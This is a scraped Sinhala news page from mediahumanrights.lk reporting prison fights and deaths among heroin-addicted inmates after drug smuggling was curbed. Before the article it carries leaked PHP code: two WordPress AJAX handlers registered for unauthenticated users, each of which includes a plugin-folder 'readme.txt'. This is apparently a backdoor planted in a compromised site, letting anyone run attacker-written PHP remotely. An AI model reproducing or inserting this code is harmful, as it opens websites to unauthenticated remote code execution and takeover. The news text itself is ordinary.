if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මත්ද්‍රව්‍ය නැතිව බන්ධනාගාර ඇතුළේ ආරවුල් - mediahumanrights.lk
mediahumanrights.lk
Local News News

මත්ද්‍රව්‍ය නැතිව බන්ධනාගාර ඇතුළේ ආරවුල්

බන්ධනාගාර තුළට මත්ද්‍රව්‍ය රැගෙන ඒම වැළැක්වීමට පියවර ගැනීම හේතුවෙන් රැඳවියන් අතර ආරවුල් වැඩි වී තිබෙනවා.

මත්ද්‍රව්‍යවලට ඇබ්බැහිවූ රැඳවියන් අතර ගුටිබැට හුවමාරුවීමක් ද හට ගෙන ඇති බවයි බන්ධනාගාර ආරංචි පැවසුවේ. හෙරොයින් භාවිතයට දැඩි ලෙස ඇබ්බැහිවූ බොහෝ රැඳවියන් හෙරොයින් නොමැතිවීමෙන් සිහිවිකල් ව හැසිරෙන බවද බොහෝ බන්ධනාගාරවලින් නෙත් නිවුස් වෙත වාර්තා වුණා.

ඉකුත් සති දෙක තුළ හෙරොයින් පානයට ඇබ්බැහි වු රැඳවියන් 04 දෙනෙකු ජීවිතක්ෂයට පත්ව තිබෙනවා. ඒ මීගමුව, කළුතර, කොළඹ රිමාන්ඞ් සහ බූස්ස බන්ධනාගාරවලදීයි.

ඉන් රැඳවියන් තිදෙනෙකු බන්ධනාගාර තුළදී සිය දිවිහානි කර ගෙන ඇති බවයි බන්ධනාගාර දෙපාර්තමේන්තුව පැවසුවේ.  

මේ අතර සියලූ බන්ධනාගාරවල අධිකාරිවරුන් අද කොළඹට කැඳවා තිබෙනවා. ඒ, බන්ධනාගාර කොමසාරිස් ජනරාල් තුෂාර උපුල්දෙනියගේ මූලිකත්වයෙන් පැවැත්වෙන විශේෂ සාකච්ඡාවක් සඳහායි. මෙහිදී, මත්ද්‍රව්‍ය නොමැති වීමෙන් බන්ධනාගාර තුළ කළහකාරිව හැසිරෙන රැඳවියන්ගේ සහ අනෙකුත් රැඳවියන්ගේ ආරක්ෂාව සම්බන්ධයෙන් ගත යුතු පියවර සම්බන්ධයෙන් වැඩි අවධානයක් යොමුකරන බවයි බන්ධනාගාර දෙපාර්තමේන්තුව පැවසුවේ.
(under the courtesy of nethnews.lk news web)

Related posts

‘අවිගන්’ පෙත්තට කොරෝනා මඩින්න බෑ.. ජපානයේවත් ලියාපදිංචි නෑ..

Shiran Viraj

ශාරුක් ඛාන් මැරුණා කිව්ව පළවෙනි වතාව මේක නෙවෙයි

Shiran Viraj

ඉතිහාසයේ පක්ෂයක් ලැබූ විශිෂ්ඨම ජය පොදුජන පෙරමුණට – එජාපය, ඉතිහාසයේ දරුණුතම පරාජය ලබයි – මාළිමාව 3%ක නවතී

Shiran Viraj